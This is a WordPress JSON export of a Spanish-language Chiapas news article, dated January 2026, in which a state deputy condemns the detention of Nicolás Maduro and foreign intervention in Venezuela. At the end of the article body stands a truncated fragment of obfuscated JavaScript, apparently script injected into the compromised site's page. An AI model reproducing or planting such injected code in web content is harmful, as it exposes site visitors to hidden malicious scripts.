{"id":26007,"date":"2026-01-06T05:18:14","date_gmt":"2026-01-06T05:18:14","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=26007"},"modified":"2026-01-06T05:18:15","modified_gmt":"2026-01-06T05:18:15","slug":"diputado-reprueba-detencion-del-presidente-nicolas-maduro","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=26007","title":{"rendered":"Diputado reprueba detenci\u00f3n del presidente Nicol\u00e1s Maduro"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"863\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000529798-863x1024.jpg\" alt=\"\" class=\"wp-image-26008\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000529798-863x1024.jpg 863w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000529798-253x300.jpg 253w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000529798-768x911.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000529798.jpg 953w\" sizes=\"auto, (max-width: 863px) 100vw, 863px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>5 de enero del 2026. El diputado Mario Guill\u00e9n Guill\u00e9n, titular de la Junta de Coordinaci\u00f3n Pol\u00edtica (JUCOPO) del Congreso de Chiapas, conden\u00f3 la medida y reafirm\u00f3 los principios de no intervenci\u00f3n y autodeterminaci\u00f3n de los pueblos.<br>Al ser consultado sobre el tema, el legislador subray\u00f3 la postura hist\u00f3rica de M\u00e9xico. \u201cComo mexicanos y como conocedores de la historia y del derecho internacional, M\u00e9xico es un pa\u00eds pacifista\u201d, se\u00f1al\u00f3.<br>En este contexto, evoc\u00f3 la m\u00e1xima juarista: \u201cEl respeto al derecho ajeno es la paz\u201d, y record\u00f3 la Doctrina Estrada como pilar de la pol\u00edtica exterior mexicana, la cual se fundamenta en el respeto a la libre determinaci\u00f3n de las naciones.<br>\u201cAqu\u00ed no se trata de juzgar qu\u00e9 tan bueno o qu\u00e9 tan malo es un gobernante de un pa\u00eds, sino el respeto al derecho internacional, buscar siempre la v\u00eda de la paz\u201d, afirm\u00f3 Guill\u00e9n Guill\u00e9n.<br>Por ello, asever\u00f3: \u201cCondenamos la intervenci\u00f3n de un pa\u00eds en Venezuela. Tr\u00e1tase de quien se trate, siempre, porque creo que esa no es la medida correcta. Los pueblos son los que deben de elegir libremente\u201d.<br>El coordinador pol\u00edtico del Congreso chiapaneco consider\u00f3 que el caso venezolano es particular, pero confi\u00f3 en que sean los mecanismos y las instancias internacionales, como las Naciones Unidas, las que busquen una salida diplom\u00e1tica al conflicto. Advirti\u00f3 que este tipo de acciones podr\u00edan sentar un precedente peligroso para otros pa\u00edses de la regi\u00f3n, incluido M\u00e9xico.<br>\u201cEs lamentable. Aqu\u00ed no se trata de la ley del m\u00e1s fuerte. Vuelvo a decir que sean los estados, los pa\u00edses, el pueblo organizado quien elige libremente a sus gobernantes\u201d, concluy\u00f3 el diputado, reiterando el llamado a resolver las controversias entre naciones mediante el di\u00e1logo y el estricto apego al marco legal internacional.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 5 de enero del 2026. El diputado Mario Guill\u00e9n Guill\u00e9n, titular de la Junta de Coordinaci\u00f3n Pol\u00edtica (JUCOPO) del Congreso de Chiapas, conden\u00f3 la medida y reafirm\u00f3 los principios de no intervenci\u00f3n y autodeterminaci\u00f3n de los pueblos.Al ser consultado sobre el tema, el legislador subray\u00f3 la postura hist\u00f3rica de M\u00e9xico. \u201cComo mexicanos y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":26008,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-26007","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/26007","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=26007"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/26007\/revisions"}],"predecessor-version":[{"id":26009,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/26007\/revisions\/26009"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/26008"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=26007"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=26007"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=26007"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}